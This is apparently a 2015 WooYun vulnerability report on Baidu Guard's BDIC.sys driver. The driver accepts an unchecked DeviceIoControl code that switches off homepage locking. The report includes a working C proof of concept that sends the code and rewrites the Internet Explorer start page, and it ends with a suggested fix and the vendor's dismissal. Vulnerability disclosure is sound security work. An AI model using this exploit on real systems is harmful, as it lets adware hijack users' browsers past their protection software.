当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122233

漏洞标题:百度卫士主页锁定绕过漏洞

相关厂商:百度

漏洞作者: 路人甲

提交时间:2015-06-24 14:54

修复时间:2015-09-27 14:57

公开时间:2015-09-27 14:57

漏洞类型:非授权访问/认证绕过

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-24: 细节已通知厂商并且等待厂商处理中
2015-06-29: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-08-23: 细节向核心白帽子及相关领域专家公开
2015-09-02: 细节向普通白帽子公开
2015-09-12: 细节向实习白帽子公开
2015-09-27: 细节向公众公开

简要描述:

百度卫士主页锁定功能的驱动BDIC.sys在实现上存在漏洞,任意程序可以利用该漏洞实现关闭主页锁定,随意修改主页为任意URL。

详细说明:

1.BDIC.sys版本:1.0.0.2000
2.开启主页锁定

settings.jpg


3.漏洞触发前,修改主页会失败,

before.jpg


4.漏洞触发后,成功修改主页为www.2345.com,

after.jpg


5.漏洞成因:驱动代码中使用几个标志位来决定是否启用主页锁定,通过DeviceIoControl使用特定的控制码可以修改这几个标志位,驱动未对调用者做任何合法性检查。

漏洞证明:

void Fuzz2(HANDLE hDev)
{
	DWORD dwReturned = 0;
	char input[4096] = { 0 };
	char output[4096] = { 0 };
	DeviceIoControl(hDev,
		0x22E00c,
		(LPVOID)input,
		1070,
		(LPVOID)output,
		1070,
		&dwReturned,
		NULL);
	LPCTSTR p = _T("http://www.2345.com");
	DWORD dwSet = SHSetValue(HKEY_CURRENT_USER, _T("Software\\Microsoft\\Internet Explorer\\Main"),
		_T("Start Page"), REG_SZ, (LPCVOID)p, (_tcslen(p) + 1)*sizeof(TCHAR));
	printf("Set Start Page:%x\n", dwSet);
}
void Fuzz1()
{
	LPCTSTR DevName = _T("\\\\.\\bd_bp_{5E8C53A3-8FFD-425a-BB1F-71FC9175B3A2}");
	HANDLE hDev = CreateFile(DevName,
		GENERIC_READ|GENERIC_WRITE,
		FILE_SHARE_READ|FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL);
	if(INVALID_HANDLE_VALUE != hDev)
	{
		Fuzz2(hDev);
		CloseHandle(hDev);
	}
}
int _tmain(int argc, _TCHAR* argv[])
{	
	Fuzz1();
	return 0;
}

修复方案:

在收到对主页锁定标志位进行修改的DeviceIoControl调用时,增加对调用者的检查。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-27 14:57

厂商回复:

漏洞Rank:8 (WooYun评价)

最新状态:

暂无